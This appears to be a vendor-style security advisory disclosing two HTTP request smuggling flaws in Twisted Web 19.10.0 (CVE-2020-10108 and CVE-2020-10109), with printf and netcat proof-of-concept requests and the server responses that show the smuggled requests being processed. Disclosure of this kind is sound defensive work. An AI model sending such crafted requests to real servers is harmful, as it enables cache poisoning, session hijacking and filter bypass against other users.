The following document describes identified vulnerabilities in the Twisted application version 19.10.0.
Request smuggling vulnerabilities are often high-risk and can lead to a variety of outcomes, including cache poisoning, session hijacking via socket poisoning, and security filter bypasses. By exploiting inconsistencies in HTTP message parsing, attackers can smuggle complete or partial secondary HTTP messages to a remote server to attack backend services or other users.
In this case, risk is highly contextual, it depends where and why Twisted is deployed in a given environment. The impact will vary depending on the business purpose of the service designed with Twisted.
For more information on the impact of HTTP request splitting vulnerabilities, please refer to the following:
High
Product Vendor |
Product Name |
Affected Version |
Twisted Matrix Labs | Twisted | 19.10.0 |
Twisted is an event-driven networking engine written in Python. The project’s official website is https://twistedmatrix.com/. The latest version of the application is 20.3.0rc1, released on March 9, 2020.
One vulnerability was identified within the Twisted application:
HTTP REQUEST SPLITTING [TWO INSTANCES]Update to version 20.3.0rc1.
This vulnerability is described in the following sections.
Two HTTP request splitting (AKA HTTP request smuggling) vulnerabilities were identified in the latest version of Twisted Web. Both issues arose from deviations from RFC 7230 (HTTP/1.1: Message Syntax and Routing). Request smuggling vulnerabilities are often high-risk and can lead to a variety of outcomes, including cache poisoning, session hijacking via socket poisoning, and security filter bypasses.
To demonstrate the vulnerabilities,
and printf
command examples are provided to construct raw HTTP messages as the client. For the server, I started Twisted Web 19.10.0 using netcat
(Twisted Framework Python apps that use twistd web --path . --port tcp:<port>
are also affected).twistd.web
CVE ID |
Security Risk |
Impact |
Access Vector |
CVE-2020-10108 | High | HTTP Request Splitting | Remote, Other |
When presented with two content-length headers, Twisted Web ignored the first header. When the second content-length was set to zero, it caused Twisted Web to interpret the request body as a pipelined request.
According to RFC 7230 Section 3.3.3#4, if a message is received with multiple content-length headers with differing value, then the server must reject the message with a 400 response.
Request
printf 'GET /doesnotexist HTTP/1.1\r\n'\
'Content-Length: 56\r\n'\
'Content-Length: 0\r\n'\
'Host: test.example.com\r\n'\
'\r\n'\
'GET /?opfdii=k58inf HTTP/1.1\r\n'\
'Host: test.example.com\r\n'\
'\r\n' | nc 127.0.0.1 <port>
Response
HTTP/1.1 404 Not Found
Server: TwistedWeb/19.10.0
Date: Mon, 09 Dec 2019 17:02:45 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 145
<html>
<head><title>404 - No Such Resource</title></head>
<body>
<h1>No Such Resource</h1>
<p>File not found.</p>
</body>
</html>
HTTP/1.1 200 OK
Server: TwistedWeb/19.10.0
Date: Mon, 09 Dec 2019 17:02:45 GMT
Accept-Ranges: bytes
Content-Length: 6
Content-Type: text/html
Last-Modified: Tue, 26 Nov 2019 23:21:03 GMT
Hello
As shown above, both the
and the smuggled request to the base path /doesnotexist
were successfully resolved.[/]
CVE ID |
Security Risk |
Impact |
Access Vector |
CVE-2020-10109 | High | HTTP Request Splitting | Remote, Other |
When presented with a content-length and a chunked encoding header, the content-length took precedence and the remainder of the request body was interpreted by Twisted Web as a pipelined request.
According to RFC 7230 Section 3.3.3#3, if a message with both content-length and chunked encoding is accepted, transfer-encoding overrides the content-length.
Request
printf 'GET /?nkomd7=8h7pjm HTTP/1.1\r\n'\
'Transfer-Encoding: chunked\r\n'\
'Content-Length: 4\r\n'\
'Content-Type: application/x-www-form-urlencoded\r\n'\
'Host: test.example.com\r\n'\
'\r\n'\
'33\r\n'\
'GET /?ab8c4i=deg3if HTTP/1.1\r\n'\
'Content-Length: 5\r\n'\
'Host: test.example.com\r\n'\
'\r\n'\
'\r\n'\
'0\r\n'\
'\r\n' | nc 127.0.0.1 <port>
Response
HTTP/1.1 200 OK
Server: TwistedWeb/19.10.0
Date: Mon, 09 Dec 2019 17:04:19 GMT
Accept-Ranges: bytes
Content-Length: 6
Content-Type: text/html
Last-Modified: Tue, 26 Nov 2019 23:21:03 GMT
Hello
HTTP/1.1 200 OK
Server: TwistedWeb/19.10.0
Date: Mon, 09 Dec 2019 17:04:19 GMT
Accept-Ranges: bytes
Content-Length: 6
Content-Type: text/html
Last-Modified: Tue, 26 Nov 2019 23:21:03 GMT
Hello
As shown above, smuggled requests were interpreted by the Twisted server. The impact of these vulnerabilities can vary depending on the surrounding infrastructure and the purpose of the service implemented with Twisted.
8240 S. Kyrene Rd.
Suite A113
Tempe, AZ
85284
United States